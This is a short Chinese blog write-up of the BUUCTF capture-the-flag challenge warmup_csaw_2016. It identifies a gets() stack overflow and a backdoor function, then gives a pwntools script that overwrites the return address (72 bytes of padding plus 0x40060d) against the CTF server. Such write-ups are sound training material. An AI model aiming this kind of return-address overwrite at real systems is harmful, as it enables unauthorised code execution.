BUUCTF刷题之路-warmup_csaw_20161

这题原本昨天就打算发的,刚做完电脑死机了。老规矩那道题IDA分析找到主函数,如图:

 大概明确函数的执行流程。而且我们在主函数一眼就看到一个危险函数gets,大概率就是个栈溢出。然后我们又在IDA中发现有system和一个后门函数,那这题就非常简单,跟上一题是一个思路的。

我们去虚拟机看下这个程序开启了哪些保护:

保护基本没开。那我们就直接栈溢出覆盖返回地址到后门函数,这题就做完了。在主函数中我们看到v5变量离rbp距离是0x40h,因为是64位程序还得加8才到返回地址。因此我们的exp如下:

from pwn import *
sh=remote('node4.buuoj.cn',27679)
#sh = process('./warmup_csaw_2016')
buf2_addr = 0x40060d
sh.sendline(b'A'*72 + p64(buf2_addr))
sh.interactive()

得到flag。

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值